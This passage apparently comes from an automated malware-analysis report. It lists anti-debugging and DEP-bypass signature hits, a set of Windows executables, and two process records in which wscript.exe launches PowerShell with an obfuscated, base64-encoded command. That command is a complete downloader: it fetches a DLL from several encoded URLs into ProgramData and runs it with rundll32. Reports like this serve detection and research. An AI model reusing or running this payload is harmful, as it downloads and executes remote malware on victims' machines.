TAB3AEEAdgBBAEgATQBBAGQAQQBCADEAQQBHADQAQQBjAHcAQgBzAEEARwBVAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAdABSAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAGoAQQBHAFUAQQBiAEEAQgBzAEEASABNAEEATABnAEIAMgBBAEcAawBBAGMAQQBBAD0AIgA7ACQATwB2AGUAcgBmAGwAYQB2AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCADEAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAYwB3AEIAMABBAEgASQBBAGQAUQBCAG4AQQBHAGMAQQBiAEEAQgBsAEEARQBZAEEAYwBnAEIAaABBAEcANABBAGEAdwBCAHMAQQBHAEUAQQBiAGcAQgBrAEEARwBrAEEAZABBAEIAbABBAEMANABBAGEAUQBCAHUAQQBIAE0AQQBkAEEAQgBwAEEASABRAEEAZABRAEIAMABBAEcAVQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABVAEEATABnAEEAeQBBAEQARQBBAE8AUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABNAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEAIgA7ACQAdwBlAGkAcgBkAGUAcgBBAGcAeQByAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAZABnAEIAbABBAEcAawBBAGQAQQBCAHAAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAGQAdwBCAHYAQQBIAEkAQQBhAHcAQQA9AHgAaAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AdwBBAHoAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A" |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABaAGEAcgB6AHUAZQBsAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQA0AEEARABjAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAHUAQQBEAFEAQQBNAEEAQQB2AEEARwBZAEEAZAB3AEEANABBAEMAOABBAE0AQQBCAEYAQQBIAGsAQQBVAEEAQQA9AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgBRAEEAdQBBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAVQBBAEwAdwBCAGgAQQBFAG8AQQBUAHcAQQB2AEEASABZAEEATQBBAEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAE0AQQBOAGcAQQB2AEEARgBFAEEAYwBBAEIAUQBBAEgARQBBAEwAdwBBADQAQQBIAEUAQQBaAFEAQQAyAEEARQBRAEEAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB4AEEARABFAEEATQB3AEEAdgBBAEcAbwBBAE4AQQBCAFUAQQBHAG8AQQBhAGcAQgB2AEEARABRAEEATAB3AEIASgBBAEcARQBBAGUAUQBCAFYAQQBGAFUAQQBkAHcAQgBaAEEARQA0AEEAUgB3AEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB2AEEARwBRAEEAVABBAEIAeQBBAEcAdwBBAFcAQQBBAHgAQQBHAEkAQQBMAHcAQQAxAEEARQBrAEEAZQBRAEIAWgBBAEQAUQBBAFoAUQBCAE0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABhAGwAbABuAGUAcwBzAEUAbgBjAHIAaQBuAGkAZABhAGUAIABpAG4AIAAkAFoAYQByAHoAdQBlAGwAYQBzACAALQBzAHAAbABpAHQAIAAiAFIAIgApACAAewB0AHIAeQAgAHsAJABDAHkAbgBpAHAAaQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAbABsAG4AZQBzAHMARQBuAGMAcgBpAG4AaQBkAGEAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEMAeQBuAGkAcABpAGQAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsADsAJABXAGgAZQBtAG0AZQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAcABBAEcANABBAFkAdwBCAGgAQQBIAEkAQQBiAGcAQgBoAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAUQBCAHQAQQBHADgAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAbABBAEcANABBAHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBrAEEAYwB3AEIAcwBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBMAGcAQgAyAEEARwA4AEEAZABBAEIAbABBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAYwBnAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBRAGcAQgBoAEEASABJAEEAYgBBAEIAbABBAEgAawBBAEwAZwBCAHoAQQBIAFEAQQBkAFEAQgBrAEEARwBrAEEAYgB3AEEAPQAiADsAJABEAGkAcwBzAGkAbQB1AGwAYQB0AGkAbwBuAHMARgBlAGMAawBsAGUAcwBzAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAFUAQQBjAGcAQgBqAEEARwBrAEEAYgBRAEIAbABBAEcANABBAGQAQQBCAFQAQQBIAFUAQQBiAEEAQgB3AEEARwBnAEEAYgB3AEIANABBAEcAawBBAGMAdwBCAHQAQQBDADQAQQBhAEEAQgBoAEEASABVAEEAYwB3AEEAPQBWAEgAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBOAEEAQQB1AEEARABRAEEATgBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABZAEEAVgBIAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwBvAEEAYgB3AEIAMwBBAEcARQBBAGIAZwBCAHoAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAYwB3AEIANQBBAEcAdwBBAGIAQQBCAGgAQQBHAEkAQQBhAFEAQgA2AEEARwBVAEEATABnAEIAagBBAEcARQBBAGMAQQBCAHAAQQBIAFEAQQBZAFEAQgBzAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAANgA1ADUAMgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAFkAdwBCAHQAQQBHAFEAQQBJAEEAQQB2AEEARwBNAEEASQBBAEIAeQBBAEgAVQBBAGIAZwBCAGsAQQBHAHcAQQBiAEEAQQB6AEEARABJAEEASQBBAEIARABBAEQAbwBBAFgAQQBCAFEAQQBIAEkAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBYAEEAQgBrAEEARwBrAEEAYwB3AEIAdgBBAEcAMABBAGQAUQBCAHoAQQBDADQAQQBaAEEAQgBzAEEARwB3AEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQAiADsAJABkAGkAcwBrAG8AZwByAGEAcABoAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBhAEEAQgB2AEEARwBrAEEAYwBnAEIAbgBBAEcAawBBAGMAZwBCAHMAQQBDADQAQQBaAHcAQgAxAEEARwBrAEEAWgBBAEIAbABBAEEAPQA9AHQAUgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCADEAQQBHADQAQQBjAHcAQgBzAEEARwBVAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAdABSAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAGoAQQBHAFUAQQBiAEEAQgBzAEEASABNAEEATABnAEIAMgBBAEcAawBBAGMAQQBBAD0AIgA7ACQATwB2AGUAcgBmAGwAYQB2AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCADEAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAYwB3AEIAMABBAEgASQBBAGQAUQBCAG4AQQBHAGMAQQBiAEEAQgBsAEEARQBZAEEAYwBnAEIAaABBAEcANABBAGEAdwBCAHMAQQBHAEUAQQBiAGcAQgBrAEEARwBrAEEAZABBAEIAbABBAEMANABBAGEAUQBCAHUAQQBIAE0AQQBkAEEAQgBwAEEASABRAEEAZABRAEIAMABBAEcAVQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABVAEEATABnAEEAeQBBAEQARQBBAE8AUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABNAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEAIgA7ACQAdwBlAGkAcgBkAGUAcgBBAGcAeQByAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAZABnAEIAbABBAEcAawBBAGQAQQBCAHAAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAGQAdwBCAHYAQQBIAEkAQQBhAHcAQQA9AHgAaAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AdwBBAHoAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A" | ||||||
parent_process | wscript.exe | martian_process | powershell -encodedcommand "JABaAGEAcgB6AHUAZQBsAGEAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE0AZwBBADMAQQBDADQAQQBNAFEAQQA0AEEARABjAEEATABnAEEAeABBAEQAZwBBAE8AUQBBAHUAQQBEAFEAQQBNAEEAQQB2AEEARwBZAEEAZAB3AEEANABBAEMAOABBAE0AQQBCAEYAQQBIAGsAQQBVAEEAQQA9AFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABRAEEATgBRAEEAdQBBAEQAUQBBAE0AZwBBAHUAQQBEAEUAQQBNAHcAQQB5AEEAQwA0AEEATQBnAEEAegBBAEQAVQBBAEwAdwBCAGgAQQBFAG8AQQBUAHcAQQB2AEEASABZAEEATQBBAEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAVQBBAEwAZwBBAHkAQQBEAE0AQQBOAGcAQQB2AEEARgBFAEEAYwBBAEIAUQBBAEgARQBBAEwAdwBBADQAQQBIAEUAQQBaAFEAQQAyAEEARQBRAEEAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABJAEEATgBRAEEAeQBBAEMANABBAE0AUQBBADMAQQBEAFUAQQBMAGcAQQB4AEEARABFAEEATQB3AEEAdgBBAEcAbwBBAE4AQQBCAFUAQQBHAG8AQQBhAGcAQgB2AEEARABRAEEATAB3AEIASgBBAEcARQBBAGUAUQBCAFYAQQBGAFUAQQBkAHcAQgBaAEEARQA0AEEAUgB3AEEAPQBSAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHkAQQBEAFUAQQBNAHcAQQB2AEEARwBRAEEAVABBAEIAeQBBAEcAdwBBAFcAQQBBAHgAQQBHAEkAQQBMAHcAQQAxAEEARQBrAEEAZQBRAEIAWgBBAEQAUQBBAFoAUQBCAE0AQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABhAGwAbABuAGUAcwBzAEUAbgBjAHIAaQBuAGkAZABhAGUAIABpAG4AIAAkAFoAYQByAHoAdQBlAGwAYQBzACAALQBzAHAAbABpAHQAIAAiAFIAIgApACAAewB0AHIAeQAgAHsAJABDAHkAbgBpAHAAaQBkACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGEAbABsAG4AZQBzAHMARQBuAGMAcgBpAG4AaQBkAGEAZQApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAEMAeQBuAGkAcABpAGQAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsADsAJABXAGgAZQBtAG0AZQBsACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBJAEEAWgBRAEIAcABBAEcANABBAFkAdwBCAGgAQQBIAEkAQQBiAGcAQgBoAEEASABRAEEAWgBRAEEAdQBBAEcAawBBAGIAUQBCAHQAQQBHADgAQQBZAGcAQgBwAEEARwB3AEEAYQBRAEIAbABBAEcANABBAHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgB0AEEARwBrAEEAYwB3AEIAcwBBAEcAawBBAFoAdwBCAG8AQQBIAFEAQQBMAGcAQgAyAEEARwA4AEEAZABBAEIAbABBAEEAPQA9AHUAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBwAEEARwA0AEEAYwBnAEIAdgBBAEcARQBBAFoAQQBCAGwAQQBIAEkAQQBRAGcAQgBoAEEASABJAEEAYgBBAEIAbABBAEgAawBBAEwAZwBCAHoAQQBIAFEAQQBkAFEAQgBrAEEARwBrAEEAYgB3AEEAPQAiADsAJABEAGkAcwBzAGkAbQB1AGwAYQB0AGkAbwBuAHMARgBlAGMAawBsAGUAcwBzAG4AZQBzAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHQAQQBHAFUAQQBjAGcAQgBqAEEARwBrAEEAYgBRAEIAbABBAEcANABBAGQAQQBCAFQAQQBIAFUAQQBiAEEAQgB3AEEARwBnAEEAYgB3AEIANABBAEcAawBBAGMAdwBCAHQAQQBDADQAQQBhAEEAQgBoAEEASABVAEEAYwB3AEEAPQBWAEgAWABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAFEAQQBOAEEAQQB1AEEARABRAEEATgBRAEEAdQBBAEQARQBBAE4AQQBBADIAQQBDADQAQQBNAGcAQQB3AEEARABZAEEAVgBIAFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBoAEEARwBvAEEAYgB3AEIAMwBBAEcARQBBAGIAZwBCAHoAQQBFADAAQQBiAHcAQgB1AEEARwA4AEEAYwB3AEIANQBBAEcAdwBBAGIAQQBCAGgAQQBHAEkAQQBhAFEAQgA2AEEARwBVAEEATABnAEIAagBBAEcARQBBAGMAQQBCAHAAQQBIAFEAQQBZAFEAQgBzAEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwAZABpAHMAbwBtAHUAcwAuAGQAbABsACkALgBMAGUAbgBnAHQAaAAgAC0AZwBlACAANgA1ADUAMgAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAFkAdwBCAHQAQQBHAFEAQQBJAEEAQQB2AEEARwBNAEEASQBBAEIAeQBBAEgAVQBBAGIAZwBCAGsAQQBHAHcAQQBiAEEAQQB6AEEARABJAEEASQBBAEIARABBAEQAbwBBAFgAQQBCAFEAQQBIAEkAQQBiAHcAQgBuAEEASABJAEEAWQBRAEIAdABBAEUAUQBBAFkAUQBCADAAQQBHAEUAQQBYAEEAQgBrAEEARwBrAEEAYwB3AEIAdgBBAEcAMABBAGQAUQBCAHoAQQBDADQAQQBaAEEAQgBzAEEARwB3AEEATABBAEIAdABBAEgAVQBBAGMAdwBCADAAQQBEAHMAQQAiADsAJABkAGkAcwBrAG8AZwByAGEAcABoAHkAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBhAEEAQgB2AEEARwBrAEEAYwBnAEIAbgBBAEcAawBBAGMAZwBCAHMAQQBDADQAQQBaAHcAQgAxAEEARwBrAEEAWgBBAEIAbABBAEEAPQA9AHQAUgBjAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgATQBBAGQAQQBCADEAQQBHADQAQQBjAHcAQgBzAEEARwBVAEEATABnAEIAegBBAEgAVQBBAGMAQQBCAHcAQQBHAHcAQQBhAFEAQgBsAEEASABNAEEAdABSAGMAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABBAEEAYQBBAEIAdgBBAEgAUQBBAGIAdwBCAGoAQQBHAFUAQQBiAEEAQgBzAEEASABNAEEATABnAEIAMgBBAEcAawBBAGMAQQBBAD0AIgA7ACQATwB2AGUAcgBmAGwAYQB2AG8AcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcATQBBAGIAdwBCADEAQQBHADQAQQBkAEEAQgBsAEEASABJAEEAYwB3AEIAMABBAEgASQBBAGQAUQBCAG4AQQBHAGMAQQBiAEEAQgBsAEEARQBZAEEAYwBnAEIAaABBAEcANABBAGEAdwBCAHMAQQBHAEUAQQBiAGcAQgBrAEEARwBrAEEAZABBAEIAbABBAEMANABBAGEAUQBCAHUAQQBIAE0AQQBkAEEAQgBwAEEASABRAEEAZABRAEIAMABBAEcAVQBBAE4AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBnAEEAdQBBAEQARQBBAE0AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABVAEEATABnAEEAeQBBAEQARQBBAE8AUQBBAD0ATgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBPAFEAQQAxAEEAQwA0AEEATgBBAEEAeABBAEMANABBAE0AUQBBADUAQQBEAFEAQQBMAGcAQQAyAEEARABNAEEATgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHkAQQBEAFUAQQBNAEEAQQB1AEEARABJAEEATgBBAEEAMgBBAEMANABBAE8AQQBBADUAQQBDADQAQQBNAGcAQQB5AEEARABRAEEAIgA7ACQAdwBlAGkAcgBkAGUAcgBBAGcAeQByAGEAdABlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBVAEEAZABnAEIAbABBAEcAawBBAGQAQQBCAHAAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYgBnAEIAbABBAEgAUQBBAGQAdwBCAHYAQQBIAEkAQQBhAHcAQQA9AHgAaAB2AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAQQBBAEwAZwBBAHkAQQBEAEEAQQBPAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEMANABBAE4AdwBBAHoAQQBBAD0APQAiADsAYgByAGUAYQBrADsAfQB9ACAAYwBhAHQAYwBoACAAewB9AH0A" |
file | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
file | C:\Windows\System32\ie4uinit.exe |
file | C:\Program Files\Windows Sidebar\sidebar.exe |
file | C:\Windows\System32\WindowsAnytimeUpgradeUI.exe |
file | C:\Windows\System32\xpsrchvw.exe |
file | C:\Windows\System32\displayswitch.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe |
file | C:\Windows\System32\mblctr.exe |
file | C:\Windows\System32\mstsc.exe |
file | C:\Windows\System32\SnippingTool.exe |
file | C:\Windows\System32\SoundRecorder.exe |
file | C:\Windows\System32\dfrgui.exe |
file | C:\Windows\System32\msinfo32.exe |
file | C:\Windows\System32\rstrui.exe |
file | C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe |
file | C:\Program Files\Windows Journal\Journal.exe |
file | C:\Windows\System32\MdSched.exe |
file | C:\Windows\System32\msconfig.exe |
file | C:\Windows\System32\recdisc.exe |
file | C:\Windows\System32\msra.exe |